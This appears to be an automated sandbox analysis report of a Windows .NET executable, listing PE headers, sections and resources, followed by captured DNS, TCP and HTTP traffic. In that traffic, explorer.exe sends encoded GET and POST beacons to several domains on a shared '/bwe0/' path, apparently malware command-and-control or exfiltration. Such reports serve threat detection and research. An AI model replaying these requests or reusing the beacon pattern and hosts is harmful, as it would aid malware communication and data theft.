                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xd90140x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xda0000x10eb8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xd70740xd7200False0.6689424753050552data7.431867015823937IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xda0000x10eb80x11000False0.06833065257352941data4.159011021337183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xec0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0xda1300x10828data
                                                RT_GROUP_ICON0xea9580x14data
                                                RT_VERSION0xea96c0x398data
                                                RT_MANIFEST0xead040x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 11, 2022 06:29:41.004913092 CEST4978980192.168.2.385.159.66.93
                                                Aug 11, 2022 06:29:41.051496029 CEST804978985.159.66.93192.168.2.3
                                                Aug 11, 2022 06:29:41.052582026 CEST4978980192.168.2.385.159.66.93
                                                Aug 11, 2022 06:29:41.052706957 CEST4978980192.168.2.385.159.66.93
                                                Aug 11, 2022 06:29:41.104178905 CEST804978985.159.66.93192.168.2.3
                                                Aug 11, 2022 06:29:41.104329109 CEST4978980192.168.2.385.159.66.93
                                                Aug 11, 2022 06:29:41.104486942 CEST4978980192.168.2.385.159.66.93
                                                Aug 11, 2022 06:29:41.150917053 CEST804978985.159.66.93192.168.2.3
                                                Aug 11, 2022 06:29:46.149816990 CEST4979580192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:46.267714977 CEST8049795192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:46.267913103 CEST4979580192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:46.268229961 CEST4979580192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:46.389197111 CEST8049795192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:46.389247894 CEST8049795192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:46.389276028 CEST8049795192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:46.389367104 CEST4979580192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:47.277070045 CEST4979580192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:48.293478012 CEST4979880192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:48.410542011 CEST8049798192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:48.410737991 CEST4979880192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:48.410831928 CEST4979880192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:48.527884007 CEST8049798192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:48.527945042 CEST8049798192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:48.527968884 CEST8049798192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:48.528224945 CEST4979880192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:48.533154964 CEST4979880192.168.2.3192.3.130.2
                                                Aug 11, 2022 06:29:48.649930954 CEST8049798192.3.130.2192.168.2.3
                                                Aug 11, 2022 06:29:53.595129967 CEST4981980192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:53.627001047 CEST804981951.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:53.627124071 CEST4981980192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:53.627378941 CEST4981980192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:53.659173965 CEST804981951.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:53.659858942 CEST804981951.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:53.659890890 CEST804981951.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:53.659977913 CEST4981980192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:54.637404919 CEST4981980192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:55.653481007 CEST4982180192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:55.692890882 CEST804982151.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:55.693022013 CEST4982180192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:55.693173885 CEST4982180192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:55.732132912 CEST804982151.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:55.733656883 CEST804982151.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:55.733702898 CEST804982151.159.175.169192.168.2.3
                                                Aug 11, 2022 06:29:55.733865023 CEST4982180192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:55.734193087 CEST4982180192.168.2.351.159.175.169
                                                Aug 11, 2022 06:29:55.773124933 CEST804982151.159.175.169192.168.2.3
                                                Aug 11, 2022 06:30:00.805016994 CEST4982280192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:01.025130033 CEST8049822103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:01.025422096 CEST4982280192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:01.027570009 CEST4982280192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:01.247374058 CEST8049822103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:01.248380899 CEST8049822103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:01.248414993 CEST8049822103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:01.248611927 CEST4982280192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:02.028383017 CEST4982280192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:03.044779062 CEST4982380192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:03.265038013 CEST8049823103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:03.265213966 CEST4982380192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:03.300090075 CEST4982380192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:03.519531965 CEST8049823103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:03.520287991 CEST8049823103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:03.520359993 CEST8049823103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:03.520493984 CEST4982380192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:03.520596027 CEST4982380192.168.2.3103.67.235.120
                                                Aug 11, 2022 06:30:03.739808083 CEST8049823103.67.235.120192.168.2.3
                                                Aug 11, 2022 06:30:08.932589054 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:09.120799065 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:09.120955944 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:09.121141911 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:09.309082031 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.063811064 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.063870907 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.063914061 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.063941002 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.063992023 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064032078 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064073086 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064121962 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064165115 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.064174891 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.064208984 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064254045 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064273119 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.064316034 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.064666033 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.122713089 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252357960 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252438068 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252470016 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252516985 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252537012 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252578020 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252595901 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252636909 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252654076 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252696037 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252713919 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252753019 CEST4982580192.168.2.3103.92.235.55
                                                Aug 11, 2022 06:30:10.252772093 CEST8049825103.92.235.55192.168.2.3
                                                Aug 11, 2022 06:30:10.252810001 CEST4982580192.168.2.3103.92.235.55

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 11, 2022 06:29:40.930696964 CEST5139153192.168.2.38.8.8.8
                                                Aug 11, 2022 06:29:40.999190092 CEST53513918.8.8.8192.168.2.3
                                                Aug 11, 2022 06:29:46.130723953 CEST6445253192.168.2.38.8.8.8
                                                Aug 11, 2022 06:29:46.148622990 CEST53644528.8.8.8192.168.2.3
                                                Aug 11, 2022 06:29:53.546819925 CEST6138053192.168.2.38.8.8.8
                                                Aug 11, 2022 06:29:53.592797995 CEST53613808.8.8.8192.168.2.3
                                                Aug 11, 2022 06:30:00.766990900 CEST6314653192.168.2.38.8.8.8
                                                Aug 11, 2022 06:30:00.802969933 CEST53631468.8.8.8192.168.2.3
                                                Aug 11, 2022 06:30:08.537314892 CEST5862553192.168.2.38.8.8.8
                                                Aug 11, 2022 06:30:08.931277990 CEST53586258.8.8.8192.168.2.3
                                                Aug 11, 2022 06:30:17.436986923 CEST5077853192.168.2.38.8.8.8
                                                Aug 11, 2022 06:30:17.702488899 CEST53507788.8.8.8192.168.2.3

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 11, 2022 06:29:40.930696964 CEST192.168.2.38.8.8.80xa222Standard query (0)www.blackyaga.xyzA (IP address)IN (0x0001)
                                                Aug 11, 2022 06:29:46.130723953 CEST192.168.2.38.8.8.80xc076Standard query (0)www.expectedclosure.oneA (IP address)IN (0x0001)
                                                Aug 11, 2022 06:29:53.546819925 CEST192.168.2.38.8.8.80xd218Standard query (0)www.kinemartigues.comA (IP address)IN (0x0001)
                                                Aug 11, 2022 06:30:00.766990900 CEST192.168.2.38.8.8.80x4560Standard query (0)www.epic45.co.ukA (IP address)IN (0x0001)
                                                Aug 11, 2022 06:30:08.537314892 CEST192.168.2.38.8.8.80x6161Standard query (0)www.mogdento.comA (IP address)IN (0x0001)
                                                Aug 11, 2022 06:30:17.436986923 CEST192.168.2.38.8.8.80x6147Standard query (0)www.posinet1.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 11, 2022 06:29:40.999190092 CEST8.8.8.8192.168.2.30xa222No error (0)www.blackyaga.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                Aug 11, 2022 06:29:40.999190092 CEST8.8.8.8192.168.2.30xa222No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                Aug 11, 2022 06:29:40.999190092 CEST8.8.8.8192.168.2.30xa222No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)
                                                Aug 11, 2022 06:29:46.148622990 CEST8.8.8.8192.168.2.30xc076No error (0)www.expectedclosure.one192.3.130.2A (IP address)IN (0x0001)
                                                Aug 11, 2022 06:29:53.592797995 CEST8.8.8.8192.168.2.30xd218No error (0)www.kinemartigues.comkinemartigues.comCNAME (Canonical name)IN (0x0001)
                                                Aug 11, 2022 06:29:53.592797995 CEST8.8.8.8192.168.2.30xd218No error (0)kinemartigues.com51.159.175.169A (IP address)IN (0x0001)
                                                Aug 11, 2022 06:30:00.802969933 CEST8.8.8.8192.168.2.30x4560No error (0)www.epic45.co.uk103.67.235.120A (IP address)IN (0x0001)
                                                Aug 11, 2022 06:30:08.931277990 CEST8.8.8.8192.168.2.30x6161No error (0)www.mogdento.commogdento.comCNAME (Canonical name)IN (0x0001)
                                                Aug 11, 2022 06:30:08.931277990 CEST8.8.8.8192.168.2.30x6161No error (0)mogdento.com103.92.235.55A (IP address)IN (0x0001)
                                                Aug 11, 2022 06:30:17.702488899 CEST8.8.8.8192.168.2.30x6147No error (0)www.posinet1.com202.172.26.50A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.blackyaga.xyz
                                                • www.expectedclosure.one
                                                • www.kinemartigues.com
                                                • www.epic45.co.uk
                                                • www.mogdento.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.34978985.159.66.9380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:29:41.052706957 CEST1720OUTGET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1
                                                Host: www.blackyaga.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 11, 2022 06:29:41.104178905 CEST1720INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Thu, 11 Aug 2022 04:29:41 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 9
                                                X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.349795192.3.130.280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:29:46.268229961 CEST10116OUTPOST /bwe0/ HTTP/1.1
                                                Host: www.expectedclosure.one
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.expectedclosure.one
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.expectedclosure.one/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
                                                Aug 11, 2022 06:29:46.389247894 CEST10116INHTTP/1.1 301 Moved Permanently
                                                Server: nginx/1.20.1
                                                Date: Thu, 11 Aug 2022 04:29:46 GMT
                                                Content-Type: text/html
                                                Content-Length: 169
                                                Connection: close
                                                Location: https://www.expectedclosure.one/bwe0/
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.349798192.3.130.280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:29:48.410831928 CEST10122OUTGET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
                                                Host: www.expectedclosure.one
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 11, 2022 06:29:48.527945042 CEST10123INHTTP/1.1 301 Moved Permanently
                                                Server: nginx/1.20.1
                                                Date: Thu, 11 Aug 2022 04:29:48 GMT
                                                Content-Type: text/html
                                                Content-Length: 169
                                                Connection: close
                                                Location: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.34981951.159.175.16980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:29:53.627378941 CEST11852OUTPOST /bwe0/ HTTP/1.1
                                                Host: www.kinemartigues.com
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.kinemartigues.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.kinemartigues.com/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
                                                Aug 11, 2022 06:29:53.659858942 CEST11852INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 11 Aug 2022 04:29:53 GMT
                                                Server: Apache
                                                Location: https://www.kinemartigues.com/bwe0/
                                                Content-Length: 243
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 69 6e 65 6d 61 72 74 69 67 75 65 73 2e 63 6f 6d 2f 62 77 65 30 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kinemartigues.com/bwe0/">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.34982151.159.175.16980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
